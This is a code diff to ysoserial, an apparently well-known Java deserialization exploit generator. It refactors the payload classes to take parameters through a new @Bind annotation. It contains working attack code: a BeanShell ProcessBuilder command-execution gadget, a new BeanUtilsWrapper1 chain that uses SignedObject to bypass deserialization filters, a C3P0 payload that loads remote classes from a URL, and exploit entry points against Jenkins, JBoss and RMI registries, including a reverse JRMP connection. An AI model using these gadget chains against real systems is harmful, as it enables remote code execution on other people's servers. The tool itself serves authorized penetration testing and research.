Update to use bindings and not a static command

src/main/java/ysoserial/GeneratePayload.java

@@ -7,8 +7,8 @@
 import java.util.Comparator;
 import java.util.List;
 
-import ysoserial.payloads.ObjectPayload;
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.interfaces.ObjectPayload;
+import ysoserial.payloads.Utils;
 import ysoserial.payloads.annotation.Dependencies;
 
 @SuppressWarnings("rawtypes")
@@ -18,12 +18,11 @@ public class GeneratePayload {
 	private static final int USAGE_CODE = 64;
 
 	public static void main(final String[] args) {
-		if (args.length != 2) {
+		if (args.length < 2) {
 			printUsage();
 			System.exit(USAGE_CODE);
 		}
 		final String payloadType = args[0];
-		final String command = args[1];
 
 		final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
 		if (payloadClass == null) {
@@ -32,13 +31,18 @@ public static void main(final String[] args) {
 			System.exit(USAGE_CODE);
 			return; // make null analysis happy
 		}
+
+		String[] newArgs = new String[ args.length - 1 ];
+		System.arraycopy( args, 1, newArgs, 0, newArgs.length );
 
 		try {
 			final ObjectPayload payload = payloadClass.newInstance();
-			final Object object = payload.getObject(command);
+			Utils.wire( payload, newArgs );
+
+			final Object object = payload.getObject();
 			PrintStream out = System.out;
 			Serializer.serialize(object, out);
-			ObjectPayload.Utils.releasePayload(payload, object);
+			Utils.releasePayload(payload, object);
 		} catch (Throwable e) {
 			System.err.println("Error while generating or serializing payload");
 			e.printStackTrace();
@@ -49,10 +53,10 @@ public static void main(final String[] args) {
 
 	private static void printUsage() {
 		System.err.println("Y SO SERIAL?");
-		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
+		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] [params...]");
 		System.err.println("\tAvailable payload types:");
 		final List<Class<? extends ObjectPayload>> payloadClasses =
-			new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
+			new ArrayList<Class<? extends ObjectPayload>>(Utils.getPayloadClasses());
 		Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
 		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
 			System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));

src/main/java/ysoserial/annotation/Bind.java

@@ -0,0 +1,14 @@
+package ysoserial.annotation;
+
+import java.lang.annotation.ElementType;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Retention;
+import java.lang.annotation.Target;
+
+@Retention( RetentionPolicy.RUNTIME )
+@Target( { ElementType.FIELD, ElementType.TYPE } )
+public @interface Bind {
+
+	String defaultValue() default "";
+
+}

src/main/java/ysoserial/exploit/JBoss.java

@@ -63,7 +63,7 @@
 import org.xnio.ssl.JsseXnioSsl;
 import org.xnio.ssl.XnioSsl;
 
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 
 
 /**

src/main/java/ysoserial/exploit/JRMPClient.java

@@ -15,7 +15,7 @@
 import javax.net.SocketFactory;
 
 import sun.rmi.transport.TransportConstants;
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 
 
 /**

src/main/java/ysoserial/exploit/JRMPListener.java

@@ -28,7 +28,7 @@
 import javassist.ClassPool;
 import javassist.CtClass;
 import sun.rmi.transport.TransportConstants;
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 import ysoserial.payloads.util.Reflections;
 
 

src/main/java/ysoserial/exploit/JSF.java

@@ -11,7 +11,7 @@
 
 import org.apache.commons.codec.binary.Base64;
 
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 
 
 /**

src/main/java/ysoserial/exploit/JenkinsCLI.java

@@ -23,7 +23,7 @@
 import hudson.remoting.Channel;
 import hudson.remoting.Channel.Mode;
 import hudson.remoting.ChannelBuilder;
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 
 /**
  * Jenkins CLI client

src/main/java/ysoserial/exploit/JenkinsListener.java

@@ -23,9 +23,9 @@
 import hudson.remoting.JarLoader;
 import sun.rmi.server.Util;
 import sun.rmi.transport.TransportConstants;
+import ysoserial.interfaces.ObjectPayload;
 import ysoserial.payloads.JRMPListener;
-import ysoserial.payloads.ObjectPayload;
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 import ysoserial.payloads.util.Reflections;
 
 
@@ -77,7 +77,7 @@ public static final void main ( final String[] args ) {
 
             System.err.println("* JarLoader oid is " + oid);
 
-            Object uro = new JRMPListener().getObject(String.valueOf(jrmpPort));
+            Object uro = new JRMPListener().getObject();
 
             Class<?> reqClass = Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest");
 
@@ -193,10 +193,10 @@ private static void exploit ( InetSocketAddress isa, long obj, int o1, long o2,
             objOut.writeLong(Util.computeMethodHash(ActivationInstantiator.class.getMethod("newInstance", ActivationID.class, ActivationDesc.class)));
 
             final ObjectPayload payload = (ObjectPayload) payloadClass.newInstance();
-            final Object object = payload.getObject(payloadArg);
+            final Object object = payload.getObject();
             objOut.writeObject(object);
             os.flush();
-            ObjectPayload.Utils.releasePayload(payload, object);
+            Utils.releasePayload(payload, object);
         }
         catch ( Exception e ) {
             e.printStackTrace(System.err);

src/main/java/ysoserial/exploit/JenkinsReverse.java

@@ -9,7 +9,7 @@
 import hudson.remoting.Channel;
 import ysoserial.exploit.JRMPListener;
 import ysoserial.payloads.JRMPClient;
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 
 
 /**
@@ -47,7 +47,7 @@ public static final void main ( final String[] args ) {
             t = new Thread(listener, "ReverseDGC");
             t.setDaemon(true);
             t.start();
-            Registry payload = new JRMPClient().getObject(myAddr + ":" + jrmpPort);
+            Registry payload = new JRMPClient().getObject();
             c.call(JenkinsCLI.getPropertyCallable(payload));
             listener.waitFor(1000);
             listener.close();

src/main/java/ysoserial/exploit/RMIRegistryExploit.java

@@ -5,9 +5,9 @@
 import java.rmi.registry.Registry;
 import java.util.concurrent.Callable;
 
+import ysoserial.interfaces.ObjectPayload;
 import ysoserial.payloads.CommonsCollections1;
-import ysoserial.payloads.ObjectPayload;
-import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.Utils;
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.secmgr.ExecCheckingSecurityManager;
 
@@ -37,7 +37,7 @@ public static void exploit(final Registry registry,
 			final String command) throws Exception {
 		new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
 			ObjectPayload payloadObj = payloadClass.newInstance();
-            Object payload = payloadObj.getObject(command);
+            Object payload = payloadObj.getObject();
 			String name = "pwned" + System.nanoTime();
 			Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
 			try {

src/main/java/ysoserial/interfaces/ObjectPayload.java

@@ -0,0 +1,22 @@
+package ysoserial.interfaces;
+
+
+
+
+public interface ObjectPayload <T> {
+
+    /*
+	 * return armed payload object to be serialized that will execute specified
+	 * command on deserialization
+	 */
+	/**
+	 * @deprecated Use {@link #getObject()} instead
+	 */
+	public T getObject ( String command ) throws Exception;
+
+	/*
+     * return armed payload object to be serialized that will execute specified
+     * command on deserialization
+     */
+    public T getObject ( ) throws Exception;
+}

src/main/java/ysoserial/payloads/ReleaseableObjectPayload.java → src/main/java/ysoserial/interfaces/ReleaseableObjectPayload.java

@@ -1,4 +1,5 @@
-package ysoserial.payloads;
+package ysoserial.interfaces;
+
 
 
 /**

src/main/java/ysoserial/payloads/BeanShell1.java

@@ -7,6 +7,9 @@
 import java.lang.reflect.Proxy;
 import java.util.Comparator;
 import java.util.PriorityQueue;
+
+import ysoserial.annotation.Bind;
+import ysoserial.interfaces.ObjectPayload;
 import ysoserial.payloads.util.Reflections;
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.PayloadRunner;
@@ -18,8 +21,17 @@
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({ "org.beanshell:bsh:2.0b5" })
 public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {
+
+	@Bind private String command;
 
-    public PriorityQueue getObject(String command) throws Exception {
+    /**
+	 * @deprecated Use {@link #getObject()} instead
+	 */
+	public PriorityQueue getObject(String command) throws Exception {
+		return getObject();
+	}
+
+	public PriorityQueue getObject() throws Exception {
 	// BeanShell payload
 	String payload = "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{\"" + command + "\"}).start();return new Integer(1);}";
 

src/main/java/ysoserial/payloads/BeanUtilsWrapper1.java

@@ -0,0 +1,50 @@
+package ysoserial.payloads;
+
+import org.apache.commons.beanutils.BeanComparator;
+
+import ysoserial.annotation.Bind;
+import ysoserial.interfaces.ObjectPayload;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Reflections;
+import ysoserial.payloads.util.Serializables;
+
+import java.security.KeyPairGenerator;
+import java.security.PrivateKey;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.PriorityQueue;
+
+// From Alvaro's stuff here: 
+// https://github.com/pwntester/SerialKillerBypassGadgetCollection/blob/master/src/main/java/serialkiller/bypass/Beanutils1.java
+@Dependencies({ "commons-beanutils:commons-beanutils:1.0"} )
+public class BeanUtilsWrapper1 implements ObjectPayload<Object> {
+
+	@Bind private ObjectPayload<?> inner;
+
+	public Object getObject(String command) throws Exception {
+		return getObject();
+	}
+
+	public Object getObject() throws Exception {
+
+	        byte[] payload_bytes = Serializables.serialize(inner.getObject());
+	        Signature signature = Signature.getInstance("SHA1withDSA");
+	        PrivateKey privateKey = KeyPairGenerator.getInstance("DSA", "SUN").genKeyPair().getPrivate();
+	        SignedObject signedObject = new SignedObject("", privateKey, signature);
+	        Reflections.setFieldValue(signedObject, "content", payload_bytes);
+
+	        BeanComparator<Object> comparator = new BeanComparator<Object>("lowestSetBit");
+	        Reflections.setFieldValue(comparator, "property", "object");
+
+	        final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
+	        Object[] queue = new Object[] {signedObject, signedObject};
+	        Reflections.setFieldValue(priorityQueue, "queue", queue);
+	        Reflections.setFieldValue(priorityQueue, "size", 2);
+
+	        return priorityQueue;
+
+	}
+
+
+
+}

src/main/java/ysoserial/payloads/C3P0.java

@@ -2,6 +2,7 @@
 
 
 import java.io.PrintWriter;
+import java.net.URL;
 import java.sql.SQLException;
 import java.sql.SQLFeatureNotSupportedException;
 import java.util.logging.Logger;
@@ -15,6 +16,8 @@
 import com.mchange.v2.c3p0.PoolBackedDataSource;
 import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
 
+import ysoserial.annotation.Bind;
+import ysoserial.interfaces.ObjectPayload;
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.annotation.PayloadTest;
 import ysoserial.payloads.util.PayloadRunner;
@@ -40,18 +43,21 @@
 @PayloadTest ( harness = "ysoserial.payloads.RemoteClassLoadingTest" )
 @Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
 public class C3P0 implements ObjectPayload<Object> {
+
+	@Bind private URL url;
+	@Bind private String className;
 
-    public Object getObject ( String command ) throws Exception {
-        int sep = command.lastIndexOf(':');
-        if ( sep < 0 ) {
-            throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
-        }
+    /**
+	 * @deprecated Use {@link #getObject()} instead
+	 */
+	public Object getObject ( String command ) throws Exception {
+		return getObject();
+	}
 
-        String url = command.substring(0, sep);
-        String className = command.substring(sep + 1);
-
+
+	public Object getObject ( ) throws Exception {        
         PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
-        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
+        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url.toString()));
         return b;
     }
 

src/main/java/ysoserial/payloads/CommonsBeanutils1.java

@@ -5,6 +5,8 @@
 
 import org.apache.commons.beanutils.BeanComparator;
 
+import ysoserial.annotation.Bind;
+import ysoserial.interfaces.ObjectPayload;
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.PayloadRunner;
@@ -13,8 +15,17 @@
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
 public class CommonsBeanutils1 implements ObjectPayload<Object> {
+
+	@Bind private String command;
 
+	/**
+	 * @deprecated Use {@link #getObject()} instead
+	 */
 	public Object getObject(final String command) throws Exception {
+		return getObject();
+	}
+
+	public Object getObject() throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 		// mock method name until armed
 		final BeanComparator comparator = new BeanComparator("lowestSetBit");